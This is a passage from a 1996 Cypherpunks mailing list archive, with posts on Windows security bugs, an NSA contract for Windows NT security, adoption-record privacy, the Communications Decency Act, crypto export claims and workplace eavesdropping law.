eliminates control that others worked hard to achieve.


>I don't see that any of your response to my essay detract from this
>basic message so I'm going to pass on a detailed reply.

Typical Nuri wimp-out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 1996 17:48:45 +0800
To: shamrock@netcom.com>
Subject: Re: Microsoft continues to mislead public about Windows security bugs (a bit long, with references)
In-Reply-To: <v02120d2dad17d87fa2cc@[192.0.2.1]>
Message-ID: <Pine.ULT.3.91.960109004907.26008D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Cc'd outsiders can browse this thread on the cypherpunks list via the
public news://nntp.hks.net/hks.lists.cypherpunks; please drop the Cc line
on followups]

I just made a couple of updates to http://www.c2.org/hackmmsoft/ after
reviewing the responses trolled up in the last several hours; take a 
gander.

On further review, I don't think Peter's latest, which you run from the
DOS command prompt to email a randomly chosen password to your email
address of choice, is that serious a threat. I don't have it on a machine
I can get to now, and I'm going to be offline tomorrow, but I'd suggest
that Sameer go ahead and post the binary soon. Btw, Peter hasn't given us
the source code, and I wouldn't post it anyway, because it would make it
too easy for someone without the proper ethic to "improve" the hack. 

I just don't want us to look like the bad guys here. I think a little
patience and bending over backwards to be nice encourages non-cypherpunk
types like Peter Miller (the Access crack) to come down on the right side. 

By the way, in response to my newsgroup posting, I got a few messages that
Bill Gates had been interviewed somewhere and had said that all the
problems with Windows security were the result of the US Government's
restrictions on the export of strong cryptography.

It's nice to see the richest man in the world on the right side of at
least one issue, but this is of course complete bullshit. ITAR has nothing
whatsoever to do with these bugs. Any press who cover the issue
incorrectly should be educated about the difference between a good
implementation that can be brute-forced in X amount of time with Y amount
of computing power because the guvmint puts limits on the key size, and a
stupid implementation that is far, far less secure than (X,Y) because of
poor programming. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Wed, 10 Jan 1996 03:50:18 +0800
To: stevenw@best.com
Subject: Re: The LOGIC of Navigator 2.0 ?
Message-ID: <Pine.BSD.3.91.960109014646.1237C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Steve, 
 
 
  I posted a message, The LOGIC of Navigator 2.0 ?, to the list 
  on 01 08 96. 
 
  That message quoted a couple of paragraphs from a Bloomberg news 
  agency newsstory.  The story is headlined, Netscape Will Release 
  an Updated Internet Browser in Two Weeks.  The story's datelined 
  Mountain View CA. 
 
  Your 01 08 96 followup message characterized my original message 
  as "garbage." 
 
  You posted your message via Best Internet Communications Inc in 
  Mountain View CA... 
 
  Whatever the significance of that may be, there's the additional 
  matter that you may not understand the significance of the phrase 
 
                        GOVERNMENT LOGIC 
 
  which I used in my original message. 
 
  I hope the following provides you sufficient context-- 
 
 
  In 02 96 Internet World, science fiction writer Vernor Vinge 
  is interviewed: 
 
    Suddenly [about 1984] people realized that if a 100 million 
    people each had computers that were one-tenth of one percent 
    as smart as the government's computers, they had much less to 
    fear about government. 
 
    Now we've entered an era where the government understands this. 
    On the one hand, police forces are legitimately [?] frightened; 
    law enforcement could become much more difficult.  But at the 
    same time --with some new laws and technology-- police powers 
    could be much greater than before....  You've heard of ubiquitous 
    computing, but how about UBIQUITOUS LAW ENFORCEMENT? 
 
 
  Developing that line of thought, Vinge says: 
 
    ...the old Clipper chip proposal recommended that GOVERNMENT 
    LOGIC be present in certain communications equipment. 
 
    For the future I think this aspect of Clipper was as significant 
    as the crypto issues.  What would it be like if a certain amount 
    of GOVERNMENT LOGIC were mandated in the design of every host 
    in a country? 
 
 
  And Vinge concludes: 
 
              WE COULD HAVE REAL-TIME TAXATION. 
 
  and 
 
        ...very fine-grain CONTROL would be possible. 
 
 
  Capitalization in the above excerpts is mine. 
 
  The whole interview is worth reading.  Its title is: Reality & 
  Fiction.  It starts at page 82.  Jeff Ubois asked the questions. 
 
 
  Every HOST in a country?  As Larry Ellison says in 12 26 95 / 
  01 02 96 Computerworld 41: 
 
    The ideal operating system arrives across a network when you 
    turn your computer on. 
 
 
  The GOVERNMENT LOGIC arrives too... 
 
 
  Cordially, 
 
  Jim 
 
 
 
  INCLOSURE: 
 
  Date: Mon, 8 Jan 1996 16:03:06 -0800 (PST)
  From: Steven Weller <stevenw@best.com>
  To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
  Subject: Re: The LOGIC of Navigator 2.0 ?


  Please refrain from posting such garbage on the cypherpunks mailing list. 
  You are not a friend, you are a pest.

  On Mon, 8 Jan 1996, James M. Cobb wrote:

  >  
  >  
  >   Friend, 
  >  
  >  
  >   01 07 96 the business news agency Bloomberg reports: 
  >  
  >     Netscape Communications Corp. said it will release in two 
  >     weeks a new version of its popular browsing software, de- 
  >     signed to keep the Internet software company ahead of rival 
  >     Microsoft Corp. 
  >                               ... 
  >  
  >     The [new] browser can use programs that are stored on cen- 
  >     tral computers on the Internet, making a personal computer's 
  >     operating system less important. 
  >  
  >  
  >   And thereby making GOVERNMENT LOGIC more important? 
  >  
  >  
  >   Cordially, 
  >  
  >   Jim 
  >  
  >  
  >  
  >  
  >   NOTE: The newsstory's headline?  NETSCAPE WILL RELEASE AN 
  >   UPDATED INTERNET BROWSER IN TWO WEEKS.  Its dateline? 
  >   MOUNTAIN VIEW, Calif. (Jan 7, 1996 4:16 p.m. EST).  Its 
  >   Nando News online filename?  biz7_1087.html 
  >  
  >  
  > 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 9 Jan 1996 10:04:07 +0800
To: cypherpunks@toad.com
Subject: NSA Rigs Win NT to B
Message-ID: <199601090127.CAA14816@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Global Internet Wins NSA Contract for Windows NT Security
Enhancement

Feasibility Study to Analyze B-Level Security
Requirements

Palo Alto, Calif., Jan. 8 -- Global Internet today
announced that the National Security Agency has awarded
them a contract to conduct a feasibility study on raising
the security level of Windows NT 3.51 to B-level.  Global
Internet will analyze Windows NT's ability to meet
B-level security requirements, as well as develop a
software prototype that demonstrates a Fortezza-based
cryptocard access control mechanism.

The contract was granted by the NSA under the Multilevel
Information System Security Initiative (MISSI), which has
the charter to provide security services for information
ranging from Unclassified but Sensitive up to and
including Top Secret.  Windows NT was originally designed
with security in mind.  A NSA evaluation team has
determined that Windows NT 3.5 with Service Pack 3
satisfies all class C-2 security requirements.  B-level
of security strengthens the C2 level security features
while providing stricter system assurances.

Global Internet has a proven expertise with Windows NT. 
Centri TNT is the only network security solution that is
fully integrated into Windows NT TCP/IP networks by
complementing and extending Windows NT's inherent
strengths, while maintaining 100% compatibility with
existing applications.  Global Internet also has
extensive experience architecting, designing and
developing high level secure operating systems.

"This project addresses anticipated security requirements
for DOD, as well as commercial customers using Windows
NT," said Michelle Ruppel, a director of the Global
Internet Software Group.  "Our analysis will address
compatibility issues with B-level security requirements
and identify the changes necessary to provide this level
of support."

According to Outlink, Inc., a New York-based research and
publishing firm focusing on the information security
market, about 80% of the PC hardware market supports
Microsoft's DOS and Windows 3.1.  This combination,
though popular, does not provide inherent security
features such as secure login, access control, auditing
and self-protection. Strong access control is a highly
desirable function of the MISSI architecture.  Trusted
Operating Systems will play a role in the MISSI success.

Windows NT is a modular OS and combined with its current
security features that are based on the Trusted Products
Evaluation Program (TPEP) C2 level of security and it's
ability to operate on the majority of customer platforms
while supporting DOS and Windows applications, the
architecture lends itself to support B-level
requirements.

An operating system with few security features allows
anyone to use the machine without validating their
identity, while allowing access to all files, objects and
resources.  C2 level security includes: auditing to allow
security-relevant events to be recorded and monitored,
discretionary (need-to-know) access controls to mediate
who can access (read or write) files and other objects
and identification and authentication (login) to require
users to identify themselves to the system before they
are allowed to use the system.

B-level security additionally includes: labeling of
users, files and other objects with a sensitivity label,
mandatory access controls to enforce a security policy
based on the labels of the users and objects and trusted
path that ensures users they are using the actual
programs provided with the system.

The Global Internet Software Group specializes in
security software for Windows NT networks and other
operating environments.  The Software Group is a division
of Global Internet, a full-service internetworking
solutions company focusing on secure, reliable
internetworking software and services.  Located in Palo
Alto, California, Global Internet is privately held and
was founded in 1993.  Global Internet Home Page:
http://www.gi.net.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an466459@anon.penet.fi
Date: Tue, 9 Jan 1996 18:22:08 +0800
To: cypherpunks@toad.com
Subject: can we trust the government as custodians of private info?
Message-ID: <9601090852.AA22761@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



   DOYLESTOWN,  Pa.  (ITN) * Carol Sandusky didn't  want  to  hear  how  her 
biological  father  supposedly stabbed her mother with an ice pick and threw 
her out a window while pregnant with Carol.  
   She  didn't  want  to know she was beaten in the face with a saucepan and 
burned with cigarettes as a toddler.  She  didn't  want  to  hear  that  her 
biological  family members accuse each other of rape,  murder,  beatings and 
infidelity.  
   Sandusky,  26,  learned  the  details  because  a  government  caseworker 
violated  her  wishes  -- and the law -- by helping a sister track her down. 
What's worse,  she said,  the same  agency  might  have  saved  her  from  a 
tormented  adolescence  had  it  disclosed  the  abuse  to Jeanne and Thomas 
Sandusky when they adopted Carol in 1973 at the age of 3 1/2.  
   "The state made a decision to take me out of this environment,  then they 
decided 20 years later to bring it back to me," Sandusky said.  "My file was 
supposed to be really private." 
   In telling her story and advocating privacy laws,  Sandusky stands  among 
the  few  trying to counter a movement promoting vigorous searches for birth 
families.  She rejects the arguments  of  those,  including  her  biological 
sister,  who  believe  she's not dealing with her adoption and must hear the 
grisly details to heal emotionally.  
   "They thought this information was going to help me.  I wasn't even  born 
yet.  What's this information going to do for me?" Sandusky said.  
   Sandusky,  her  parents  and her husband recently filed a federal lawsuit 
against the Cumberland County Children  and  Youth  Services,  administrator 
Gary  I.  Shuey  and  the  person she blames for improperly revealing sealed 
information, former agency caseworker Marlene Bohr.  They contend the agency 
violated Sandusky's privacy and fraudulently withheld information that would 
have led her adoptive parents to seek therapy for her years earlier.  
   In  Pennsylvania,  adoptees  may  obtain  information  about  their birth 
parents with the consent of a court and the parents,  but  the  law  forbids 
agencies from opening records to siblings.  Most states have restrictions on 
adoption records.  
   Bohr did not return messages left on her home answering machine and Shuey 
didn't return calls to his office.  Ruby D.  Weeks,  attorney for the  youth 
agency, referred calls to county solicitor Hank Johnson, who said he had not 
seen the lawsuit and could not comment.  
   Sandusky's ordeal started in February 1992, two months after her wedding.  
   At 22, Sandusky had achieved stability after an adolescence marked by 
bulimia,  suicide attempts and hospital stays for emotional problems.  Along 
with a new marriage, she had a good job as a nanny.  
   Her parents then got a call from Bohr saying the eldest  of  Carol's  two 
older  biological  sisters was looking for her.  The Sanduskys,  who live in 
Newtown, Bucks County,  refused to divulge their daughter's phone number but 
passed the message to her, along with Bohr's number.  
   "I  said,  'Throw the number out,' " Sandusky recalled.  But her parents, 
   who also have a biological son, 17-year-old Brad, 
encouraged her to call as a matter of courtesy.  Talking on the  phone  with 
   Bohr, Sandusky said, she learned that her sister 
"had  a  great  need  to  see  me  because she protected me during infancy." 
Sandusky was put off by that great need and mortified when she  learned  the 
sister had located her biological parents and grandparents.  
   "I didn't want to be involved with any of that," said Sandusky.  "I said, 
'No way.' " 
   Sandusky did, however,  agree to hear medical background information from 
Bohr.  Instead, Sandusky said, she ended up with disturbing information from 
the caseworker and two years' worth of bizarre,  harassing letters from  the 
sister.  First came the medical information from Bohr.  
   "She  said,  'It looks as if you were beaten in the face with a saucepan. 
It looks as if you have cigarette burns.  It looks like you were tied  to  a 
chair  and shot up with Thorazine.  I have a picture right in front of me of 
your face with a huge hand print on it,' " Sandusky recalled.  
   The abuse reportedly came at the hands of her birth parents  and,  later, 
her foster parents.  
   "That wasn't what I expected to hear.  That's not what I consider medical 
information, and I hung up the phone," Sandusky said.  
   Two days later,  she got the first letter from her  sister,  who  is  two 
years older. Many others followed, detailing not only family medical history 
but also family brutality.  
   "It's  unbelievable  what  this  family  life  was  like," said Sandusky.  
   Sandusky and her husband eventually moved to a new home in Bucks County, 
fearful  of  visits  from  blood  relatives.  In  the  letters,  the  sister 
   indicated Bohr had given her extensive details 
about  Sandusky and other biological relatives.  Sandusky's anger focuses on 
   Bohr. In a thick file, she has letters from 
state lawmakers who agree that,  by law,  Bohr had no  business  calling  on 
behalf of the sister.  
   But District Attorney Michael Eakin, in a statement issued at year's end, 
said the two-year statute of limitation in the case had expired,  giving him 
no legal avenue to press charges. He declined to comment further.  
   Florence Anna Fisher,  who helped found the adoptee  search  movement  25 
years  ago  by  launching Adoptees' Liberty Movement Association,  advocates 
breaking laws that keep information from  adoptees.  She  said  she  doesn't 
understand Sandusky's complaint.  
   "Nobody can pressure you into staying on the phone and seeing someone you 
don't want to see if you're an adult," Fisher said.  
   She agrees adoptees should be left alone if they want no contact, but she 
believes  that  all adoptees really do want to know about their past and owe 
it to their children and grandchildren to find out.  
   "If they told me I had been burned,  if they told me I had been abused as 
a  child,  I  would rather know that than walk around a blank slate all (my) 
life," she said.  
   Joanne W.  Small,  executive director of Adoptees in Search in  Bethesda, 
Md.,  said  the Sandusky case should not be used as a reason to keep records 
closed.  "It must be considered atypical and aberrant," she said.  
   But Mary Beth Style,  vice president of the National Council for Adoption 
in  Washington,  D.C.,  the  prime  organization  lobbying  to keep adoption 
records closed, said she receives calls from people hysterical over unwanted 
contacts.  One woman in Washington state reported that an  intermediary  had 
violated  her  wishes  and  revealed her identity to her birth daughter.  It 
turned out the daughter worked for the mother's husband.  
   "You're assuming that these adults cannot make decisions  on  their  own, 
that  they're in denial and you're going to help them," she said.  "There is 
no way to protect the quality of the searches and I'm very  concerned  about 
that." 
   Even  initial  contacts  can be traumatic for people who thought they had 
put adoptions behind them, according to Style, who added that opening closed 
records also erodes trust among those considering adoption.  
   For her part,  Sandusky,  who hopes to adopt someday,  can do without the 
biological family reunion.  
   "They  almost  killed  me,"  she  said.  "I  don't  need to confront that 
situation." 
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 9 Jan 1996 22:47:13 +0800
To: cypherpunks@toad.com
Subject: A little skepticism over $60 billion
Message-ID: <199601091428.JAA16977@pipe9.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 08, 1996 21:16:20, 'Bill Stewart <stewarts@ix.netcom.com>' quoted
dang@netcom.com's post about a S.F. Examiner story, to wit: 
 
 
>> 
>>NEW YORK U.S. companies will lose as much as 30 percent of the $200  
>>billion in U.S. computer system sales expected 
> 
 
B. Stewart went on to remark: 
 
>OK, so crypto export laws will cost.... 
 
The phrase "as much as" does not mean "will," as in: 
 
"Lose as much as 14 pounds this month with the newly discovered miracle
diet...." or 
 
"Studies show as many as 1 in 4 students will be raped while ...." 
 
The phrases use weasel words that say little about the real nature of the
real world. How much money will companies *likely* lose, how many *likely*
pounds lost, how many *likely* rapes? None of the "studies" say. 
 
Assuming the studies are reliable in the first place, the only thing the
weasel words state accurately is the potential maximum, E.G. 
 
"You can starve yourself all you want and the universe will die a heat
death before any human being will ever lose more than 14 pounds on our diet
and you may not lose anything...." or 
 
"No matter how much we fudge with the English language's definition of
'rape' for political reasons, we can't get estimates above 1 in 4 ...." 
 
Now we know that U.S. companies will lose something off the government's
anti-export policies. But will we really see 30% of sales lost by
purchasing agents saying "Gee, we'd like to buy IBM mainframe's and Dell
micros and Windows and unix but we won't because there is no secure
encryption program in the world that will run on the IBM or U.S. micros or
under the U.S. OS's"? 
 
Let's fight the export laws over exporting quality crypto without accepting
advertising hype from any industry. 
 
-- 
     -- tallpaul 
     -- Any political analysis that fits on a bumper sticker is wrong. 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 9 Jan 1996 22:50:52 +0800
To: cypherpunks@toad.com
Subject: Re: S.652 (H.R. 1555)
In-Reply-To: <199601090608.WAA25533@netcom14.netcom.com>
Message-ID: <Mkwbpze00YUv81Jqs3@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 8-Jan-96 S.652 (H.R. 1555) by Harry
Bartholomew@netcom 
>     Perhaps some of our more lawyerly types can decipher whether
>     it is getting better or worse as the conference committee chews.
>     Not I.

I'm not a lawyerly type by any means, but my understanding is that it's
getting worse:

* The provision prohibiting the FCC from regulating the Net has been removed.
* The max fine for "indecent" speech is now $250,000.

The budget crisis stalled work on the legislation, and many
congressperns are out of town. But the Senate wants the bill to pass in
its current form, as does the White House -- Gore called it "an early
Christmas present to the American people."

The only opposition is from the House freshman Republicans, who are
criticizing the bill on other grounds. Since they don't want to be seen
as "porn-sympathetic," my guess is that the indecency provisions will
stay in. And the bill should become law within the next month.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 10 Jan 1996 02:34:32 +0800
To: cypherpunks@toad.com
Subject: Re: Microsoft continues to mislead public about Windows          securitybugs (a bit long, with references)
Message-ID: <199601091809.KAA15511@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  0:37 1/9/96 -0800, Lucky Green wrote:
>
>Very true. But why does it always seem to take an exploitable crack before
>companies pay attention to security flaws? Is it because they are unable to
>admit that they have made a mistake? Everybody makes mistakes. What's the
>big deal? I really don't understand it. Any psychologists on this list?

Having, in the past, attempted to sell an Operating System with high
security features, and failed, I think I can give you some insight. 
Security does not sell an OS to anyone, even the Department of Defense. 
People buy OSs to run applications.  The only thing a lack of security in
an OS will do is allow someone in an obscure department (perhaps called
Corporate Security) to say no.

Security is a checkoff item, and if you can convince a retired major that
the OS is secure, then he will approve it.  He is not going to check the
details.  His expertise is in guard stations and chain link fences. 
However, if someone, e.g. the trade press, rubs his nose in the fact that
an OS's security can be breached, then he will take action.  He will
pressure the publisher to release a fix that they say will fix the problem.
 When they do, he will be happy.

Microsoft particulary, is oriented to selling product, not pride in workmanship.


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz@netcom.com             Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Wed, 10 Jan 1996 03:00:54 +0800
To: cypherpunks@toad.com
Subject: NSA and NT security
Message-ID: <199601091826.KAA06961@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



PALO ALTO, Calif., Jan. 8 /PRNewswire/ via Individual Inc. -- Global
Internet today announced that the National Security Agency has awarded them
a contract to conduct a feasibility study on raising the security level of
Windows NT 3.51 to B-level. Global Internet will analyze Windows NT's
ability to meet B-level security requirements, as well as develop a software
prototype that demonstrates a Fortezza-based cryptocard access control
mechanism. 

The contract was granted by the NSA under the Multilevel Information System
Security Initiative (MISSI), which has the charter to provide security
services for information ranging from Unclassified but Sensitive up to and
including Top Secret. Windows NT was originally designed with security in
mind. A NSA evaluation team has determined that Windows NT 3.5 with Service
Pack 3 satisfies all class C-2 security requirements. B-level of security
strengthens the C2 level security features while providing stricter system
assurances. 

Global Internet has a proven expertise with Windows NT. Centri TNT is the
only network security solution that is fully integrated into Windows NT
TCP/IP networks by complementing and extending Windows NT's inherent
strengths, while maintaining 100% compatibility with existing applications.
Global Internet also has extensive experience architecting, designing and
developing high level secure operating systems. 

"This project addresses anticipated security requirements for DOD, as well
as commercial customers using Windows NT," said Michelle Ruppel, a director
of the Global Internet Software Group. "Our analysis will address
compatibility issues with B-level security requirements and identify the
changes necessary to provide this level of support." 

According to Outlink, Inc., a New York-based research and publishing firm
focusing on the information security market, about 80% of the PC hardware
market supports Microsoft's DOS and Windows 3.1. This combination, though
popular, does not provide inherent security features such as secure login,
access control, auditing and self-protection. Strong access control is a
highly desirable function of the MISSI architecture. Trusted Operating
Systems will play a role in the MISSI success. 

Windows NT is a modular OS and combined with its current security features
that are based on the Trusted Products Evaluation Program (TPEP) C2 level of
security and it's ability to operate on the majority of customer platforms
while supporting DOS and Windows applications, the architecture lends itself
to support B-level requirements. 

An operating system with few security features allows anyone to use the
machine without validating their identity, while allowing access to all
files, objects and resources. C2 level security includes: auditing to allow
security-relevant events to be recorded and monitored, discretionary
(need-to-know) access controls to mediate who can access (read or write) files
and other objects and identification and authentication (login) to require
users to identify themselves to the system before they are allowed to use
the system. 

B-level security additionally includes: labeling of users, files and other
objects with a sensitivity label, mandatory access controls to enforce a
security policy based on the labels of the users and objects and trusted
path that ensures users they are using the actual programs provided with the
system. 

The Global Internet Software Group specializes in security software for
Windows NT networks and other operating environments. The Software Group is
a division of Global Internet, a full-service internetworking solutions
company focusing on secure, reliable internetworking software and services.
Located in Palo Alto, California, Global Internet is privately held and was
founded in 1993. Global Internet Home Page: http://www.gi.net. 

/CONTACT: Jim Adams of Adams And Associates, 408-370-5390, or E-mail:
jaadams@ix.netcom.com, for Global Internet; or Mark R. Kriss of Global
Internet, 415-855-1700, or E-mail: mkriss@gi.net/ 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don Gaffney <gaffney@emba.uvm.edu>
Date: Tue, 9 Jan 1996 23:46:23 +0800
To: Harry Bartholomew <bart@netcom.com>
Subject: Re: S.652 (H.R. 1555)
In-Reply-To: <199601090608.WAA25533@netcom14.netcom.com>
Message-ID: <Pine.3.89.9601091009.F11357-0100000@griffin.emba.uvm.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jan 1996, Harry Bartholomew wrote:

> 
>     http://www.cdt.org/policy/freespeech/12_21.cda.html
> 
>     This title may be cited as the "Communications Decency Act of 1995".
> 
>     Perhaps some of our more lawyerly types can decipher whether
>     it is getting better or worse as the conference committee chews.
>     Not I.
> 

I'm not a lawyer, but from what I've read from the WWW site above, it
seems that only providing "indecent" materials to minors is prohibited.
I think this is already illegal.

Broadcasting or sending unsolicited "indecent" materials is also 
prohibited, but that seems to have always been the case (except that 
objectionable materials have been called "obscence" rather than "indecent").

There are provisions, as I read it, that protect electronic 
intermediaries from the acts of the actual publishers of the materials 
(i.e. an ISP is not responsible for the material of other internet sites
not under their control).

It sounds to me like the only real task posed is to authenticate those
accessing questionable materials as being >= 18 years old. Hmmmm. Don't
authentication & crypto go hand-in-hand?

Anyway, being rather foolish I suppose, I don't exactly see what the big
deal is - am I missing something???
_____________________________________________________________________
Don Gaffney
Engineering, Mathematics & Business Administration Computer Facility
University of Vermont
237 Votey Building
Burlington, VT  05405
(802) 656-8490
Fax: (802) 656-8802






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Wed, 10 Jan 1996 03:07:15 +0800
To: alt.folklore.suburban@c2.org
Subject: Re: [NOISE] [Fwd: Re: ABOI: Desperate User Support]
In-Reply-To: <199601082050.PAA01206@thor.cs.umass.edu>
Message-ID: <Pine.SUN.3.91.960109103444.1204A-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 8 Jan 1996, Futplex wrote:

> > > >Some poor SuperMac TechSport got a call from some middle level official...
> > > >from the legitimate government of Trinidad.  The fellow spoke very good
> > > >English, and fairly calmly described the problem.
> > > 
> > > >It seemed there was a coup attempt in progress at that moment.  
> [...]

God...are we going to have to endure this like we have had to endure that 
stupid good times virus e-mail crap? Let it die.  Let it die.
______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Wed, 10 Jan 1996 13:59:53 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Still [NOISE] but a.f.urban was clearly wrong [Fwd: Re: ABOI: Desperate User Support])
In-Reply-To: <Pine.ULT.3.91.960108172827.24082E-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960109104551.1204B-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



Let it die...Please.

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 10 Jan 1996 00:23:37 +0800
To: cypherpunks@toad.com
Subject: Eavesdrop Law
Message-ID: <199601091608.LAA16877@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   As variation on the recent discussion of employee e-rights,
   WSJ today:


   New eavesdropping law creates labor-management tussle in
   Illinois.

   The Illinois AFL-CIO is going to court to fight a provision
   in a bill Gov. Jim Edgar signed last month that the labor
   group says allows employers to listen in on employees'
   conversations "for virtually any reason." A spokesman for
   the Illinois Retail Merchants Association, the provision's
   prime backer, says such fears are "wild speculation."

   Critics say the provision's language, allowing monitoring
   for "service quality control or for educational, training,
   or research purposes," is far too broad.

   The retail merchants association notes that employers are
   responsible for the conduct of employees who deal with
   customers over the phone.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Evan Ravitz <evan@darkstar.cygnus.com>
Date: Wed, 10 Jan 1996 02:45:39 +0800
To: dnowch2@teleport.com
Subject: Re: DNow2> Re: DNow2 Re: Hammill 1987 speech
In-Reply-To: <Pine.SV4.3.91.960108224625.5588C-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960109110715.11625H-100000@darkstar.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 8 Jan 1996, Alan Horowitz wrote:
> Thanks for that lovely peice about the Chiapas uprising. I'm saving it to 
> disk. It's so archtypal of the turgid prose of graduates of Moscow's 
> Patrice Lumumba University. How wondrous that leftists-without-a-home can 
> find a cause to latch onto and keep their rhetorical skills in practice.

Carlos Fuentes calls the rebellion the first "post-Communist" revolution. 
They specifically reject the rhetoric you set up as a straw-man. If you 
want to actually become informed about reality down there (I lived in 
Chiapas 2 winters, Guatemala 4), please subscribe to the mailing list 
that the NY Times says has prevented more Mexican Army massacres:

To subscribe to the chiapas-l list send a message to:   

	majordomo@profmexis.dgsca.unam.mx 

with these words in the body of the message: 

	subscribe chiapas-l Your-Email-Adress

and leave the subject line empty. You will receive a welcome message with
info on the group *and on how to unsubscribe*. You should save this 
message for future reference. You can expect several messages per day.

> Want to come with me tomorrow? I'm going down to the library to re-read
> the history of the Indians of Meso-America.  I like the part about the
> hundreds of thousands of peasants who had their hearts cut out without
> anesthesia, so that the Emperor could collect lots of taxes on an abundant
> harvest.  Damn shame that the Spaniards came along and destroyed a
> culture, ya know? 

Having lived with Mayans for 6 winters I still have my heart and suggest 
you don't hold the campesinos responsible for their "emperor's" actions 
of centuries ago.

Stop fighting the cold war and against the past and transcend virtual 
reality and see how others really live and act. Or is your ignorance such 
bliss? My Mayan friends are some of the finest I have. 


     Evan Ravitz, director,  VOTING BY PHONE FOUNDATION:  evanr@vote.org
    Electronic democracy! From the directors of the U.S. National Science 
   Foundation's 1974 Televote trials and Boulder's 1993 ballot initiative:
http://www.vote.org/v  A FUTURE PASTURES PRESENTATION. We sell voting systems 
"What government is best? That which teaches us to govern ourselves." -Goethe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 10 Jan 1996 00:38:43 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: S.652 (H.R. 1555)
In-Reply-To: <Mkwbpze00YUv81Jqs3@andrew.cmu.edu>
Message-ID: <Pine.BSF.3.91.960109112041.14976E-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 9 Jan 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 8-Jan-96 S.652 (H.R. 1555) by Harry
> Bartholomew@netcom 
> >     Perhaps some of our more lawyerly types can decipher whether
> >     it is getting better or worse as the conference committee chews.
> >     Not I.
> 
> I'm not a lawyerly type by any means, but my understanding is that it's
> getting worse:
> 
> * The provision prohibiting the FCC from regulating the Net has been removed.
> * The max fine for "indecent" speech is now $250,000.
                                              ^^^^^^^^^

Probably accomplished by making the "crime" a felony.  Standard fine for 
Title 18 cases is $250,000 (there are exceptions, of course.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 10 Jan 1996 00:51:52 +0800
To: Don Gaffney <gaffney@emba.uvm.edu>
Subject: Re: S.652 (H.R. 1555)
Message-ID: <2.2.32.19960109163321.006a3fdc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 1/9/96 -0500, Don Gaffney wrote:
>On Mon, 8 Jan 1996, Harry Bartholomew wrote:
>
>> 
